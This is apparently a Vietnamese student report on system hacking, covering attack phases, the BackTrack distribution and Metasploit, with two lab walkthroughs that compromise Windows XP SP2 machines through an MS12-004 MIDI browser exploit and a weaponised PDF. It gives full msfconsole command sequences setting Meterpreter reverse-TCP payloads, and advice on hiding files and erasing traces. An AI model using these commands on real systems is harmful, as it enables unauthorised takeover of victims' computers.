tấn công vào hệ thống. Thông thường, các forum của các hãng nổi tiếng luôn cập nhật các lỗ hổng bảo mật và việc khai thác các lỗ hổng đó như thế nào thì tùy từng người. Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới của hệ điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa mạng vẫn đang ngày càng phát triển nhanh hơn so với chu trình cập nhật và đổi mới hệ điều hành của Microsoft. Tội phạm mạng thường sử dụng các lỗ hổng trong các mã chương trình để truy cập vào các dữ liệu và tài nguyên trên máy tính bị lỗi bảo mật. Các chương trình độc hại được thiết kế đặc biệt để khai thác các lỗ hổng này, được gọi là kỹ thuật exploit, đang ngày càng phổ biến nhanh chóng.
  • 4. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 4 Những sản phẩm của Microsoft thường gặp phải các lỗ hổng bảo mật như HĐH Windows,InternetExplorer,WindowsServer,MicrosoftExchangevà.NetFramework. 1.3 Quá trình tấn công vào một hệ thống Trước tiên ta sẽ tìm hiểu tổng quát một quá trình tấn công hệ thống. Mục tiêu phía trước của chúng ta là một hệ thống máy tính. Các bước để tấn công, đánh sập nó, có thể được liệt kê như hình vẽ bên cạnh. Nó gồm 6 công đoạn như sau: Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong hệ thống. Sử dụng phương pháp thăm dò SNMP để có được những thông tin hữu ích, chính xác hơn. Crack: Công đoạn này có lẽ hấp dẫn nhiềuHackernhất. Bước này yêu cầu chúng ta bẽ khóa mật khẩu đăng nhậpcủauser.Hoặcbằngmộtcáchnàokhác,mụctiêu phải đạt tới là quyền truy cập vào hệ thống.
  • 5. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 5 Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ user binh thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn công. Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị trước malware, keylogger, rootkit…để chạy nó trên máy tính tấn công. Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần phải được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt. Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tin có liên quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu không khả năng bạn bị phát hiện là kẻ đột nhập là rất cao. Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ thuật như Footprinting,Socialengineering,Enumeration,GoogleHacking…đãđượcápdụng cho mục đích truy tìm thông tin. Khi hệ thống mục tiêu đã được xác định, chúng ta bắt đầu đi vào quá trình tấn cônghệthốngthậtsự.Taphảitiếnhànhnhữngkỹthuậtkhácnhauđểlàmsaovào được trong hệ thống đó, thực hiện những việc mà mình mong muốn, như xóa dữ liệu, chạy chương trình trojan, keylogger…
  • 6. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 6 PHẦN 2: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG MẠNG LAN 2.1 Hệ điều hành Backtrack 5 R3 Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm xâm nhập. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor. Trong phiênbảnhiệntại củanó(5),BacktrackđượcdựatrênphiênbảnphânphốiLinux Ubuntu 11.10. Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác nhau. Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas M.(www.slax.org)). Backtrack liên tục cập nhật các công cụ, drivers,...Hiện tại Backtrack có trên 300 công cụ phục vụ cho việc nghiên cứu bảo mật. Backtrack là sự kết hợp giữa 2 bộ công cụ kiểm thử bảo mật rất nổi tiếng là Whax và Auditor. Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Backtrack 5 có thể được phân loại như sau: Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail, trang web, máy chủ mail, và như vậy. Thông tin này được th u thập từ các thông tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu. Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng làm portscanning. Vulnerabilityidentification:Trongthểloạinày,chúngtacóthểtìmthấycác công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) vàSimple Network Management Protocol (SNMP).
  • 7. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 7 Web application analysis: loại này chứa các công cụ có thể được sử dụng trong theo dõi, giám sát các ứng dụng web. Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể loại này. Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu. Privilegeescalation:Saukhikhaitháccáclỗhổngvàđượctruycậpvàocác máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất. Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được nhữngđặc quyềncaonhấttrướckhicácchúngtacóthểcàiđặtcôngcụđểduytrì quyền truy cập. Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ trong thể loại này. Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn. Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi. Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtracklinux.org/downloads/
  • 8. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 8 2.2 Phần mềm Metasploit Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống phát hiện tấncôngmạng.MetasploitFrameworklàmộtmôitrườngdùngđểkiểmtra,tấn côngvà khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đốitượngPerl,vớinhữngcomponentsđượcviếtbằngC,assembler,vàPython. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Chúng ta cóthể download chương trình tại www.metasploit.com. Metasploit hỗ trợ nhiều giao diện với người dùng: Consoleinterface:dùnglệnhmsfconsole.Msfconsoleinterfacesửdụngcác dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn. Webinterface:dùngmsfweb,giaotiếpvớingườidùngthôngquagiaodiện Web. Command line interface: dùng msfcli. Metasploit Enviroment: Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg, những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits. TemporaryEnviroment:Đượcthựcthithôngqua2câulệnhsetvàunset, enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng đếncácmoduleexploitkhácChúngcóthểlưulạienviromentmìnhđãcấu hình thông qua lệnh save. Môi trường đó sẽ được lưu trong ./msf/config và sẽ được load trở lại khi user interface được thực hiện. Sử dụng Metasploit Framework: a)Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác Show exploits: xem các module exploit mà framework có hỗ trợ. Use exploit_name: chọn module exploit.
  • 9. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 9 Info exploit_name: xem thông tin về module exploit. Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các modul trên www.metasploit.comhoặcqualệnhmsfupdatehoặc svnupdat/opt/metasploit/msf3/. b)Cấu hình Module exploit đã chọn: show options: Xác định những options nào cần cấu hình. set : cấu hình cho những option của module đó. Một vài module còn có những advanced options, chúng ta có thể xem bằng cách gõ dòng lệnh show advanceds. c)Verify những options vừa cấu hình: check: kiểm tra xem những option đã được set chính xác chưa. d)Lựa chọn target: show targets: những target được cung cấp bởi module đó. set: xác định target nào. e)Lựa chọn payload: show payloads: liệt kê ra những payload của module exploit hiện tại. info payload_name: xem thông tin chi tiết về payload đó. setpayloadpayload_name:xácđịnhpayloadmodulename.Saukhilựachọn payload nào, dùng lệnh show options để xem những options của payload đó. show advanced: xem những advanced options của payload đó. g)Thực thi exploit: exploit:lệnhdùngđểthựcthipayloadcode.Payloadsauđósẽcungcấpcho chúng ta những thông tin về hệ thống được khai thác.
  • 10. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 10 2.3 Sơ đồ tổng quan hệ thống mạng LAN Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với khoảng cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … Các máy tính trongmạngLANcóthểchiasẻtàinguyênvớinhau,màđiểnhìnhlàchiasẻtập tin, máy in, máy quét và một số thiết bị khác. Khi một máy tính ở trong mạng LAN, nó có thể sử dụng các chương trình, phần mềm quét hệ thống mạng để biết được địa chỉ IP các host có trong mạng. Nmap(NetworkMapper)làmộttiệníchnguồnmởmiễnphíchopháthiện mạng và kiểm toán an ninh. Nmap và Zenmap (Công cụ hỗ trợ đồ họa của nmap) được cài đặt sẵn trong BackTrack, sử dụng các gói tin IP giúp xác định host nào có sẵn trên mạng, cácdịchvụ(tênứngdụngvàphiênbản)màhostđóđangcungcấp,hệđiều hànhgì(vàcácphiênbảnhệđiềuhành)màhọđangchạy,loạibộlọcgóitinhoặc tường lửa nào đang sử dụng, và nhiều đặc điểm khác. Nmap chạy được trên tất cả các hệ điều hành, và các gói nhị phân chính thức có sẵn cho Linux, Windows, và Mac OS X. Sau khi xác định được các host có trong mạng, ta có thể sử dụng các công cụ quét lỗi hệ thống để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai thác truy cập
  • 11. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 11 vào hệ thống. Một trong số các công cụ quét lỗi này là Nessus, download tại địa chỉ http://www.nessus.org/. Mộtkhiđãxâmnhậpthànhcôngvàchiếmđượctoànquyềnđiềukhiểnhệ thống,Hackercóthểthựchiệnmọiviệctrênmáynạnnhânnhưdown/uploadfiles, thayđổicấutrúchệthống,thựcthichươngtrình,đánhcắpmậtkhẩu,càitrojan/ backdoor, … 2.4 Xâm nhập và khai thác Windows XP 2.4.1 Lỗ hổng sử dụng: Ms12_004 Khởi động msfconsole tử cửa sổ terminal của BackTrack. Khai báo lỗ hổng sử dụng và thiết đặt options: Search ms12_004 use exploit/windows/browser/ms12_004_midi show options set SRVHOST 192.168.159.128 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.159.128 exploit
  • 12. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 12 BackTrack sẽ tạo ra một link chứa mã độc (http ://192.168.159.128:4444). Chỉ cần nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc sang máy nạn nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn nhân đó. Tiến hành khai thác máy nạn nhân có IP: 192.168.159.130 port 1078.
  • 13. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 13 sessions sessions –i 1 getuid sysinfo Hacked: khai thác thành công lỗi ms12_004 trên winXP SP2. Nạn nhân : Computer: QUYDONGN – 3B5D9F. Os: Windows XP (Build 2600. Service Pack 2). Architecture: x86. Systemlanguage: en US. Meterpreter: x86/win32.
  • 14. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 14 2.4.2 Lỗ hổng sử dụng thông qua file PDF Khởi động msfconsole tử cửa sổ terminal của BackTrack. Khai báo lỗ hổng sử dụng và thiết đặt options: Search nojs use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs show options set FILENAME hack.pdf set payload windows/meterpreter/reverse_tcp set LHOST 192.168.136.128 set LPORT 4444 exlpoit Backtrack thông báo đã tạo thành công 1 file hack.pdf nằm trong thư mục /root/ms4/local/. use multi/hanler set payload windows/meterpreter/reverse_tcp
  • 15. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 15 set LHOST 192.168.136.128 exploit Backtrack thông báo đã sẵn sàng cho việc tấn công. Chúng ta sẽ gửi file hack.pdf vừa tạo ra trước đó cho nạn nhân. Nếu nạn nhân mở file hack.pdf thì Backtrack sẽ gửi các mã độc sang máy nạn nhân để lấy thông tin và chiếm quyền điều khiển máy nạn nhân.
  • 16. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 16 Backtrack thông báo có 1 sessions đã mở file hack.pdf là máy có địa chỉ IP 192.168.136.128 port 1037 và đã gửi 752128 file mã độc sang máy nạn nhân. Tiếp theo chúng ta sẽ kiểm tra thông tin máy nạn nhân. sysinfo
  • 17. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 17 Hacked: khai thác thành công thông qua lỗi file PDF trên winXP SP2 Nạn nhân: Computer: HUUANHH – 9091FB1. Os: Windows XP (Build 2600. Service Pack 2). Architecture: x86. Systemlanguage: en US. Meterpreter: x86/win32.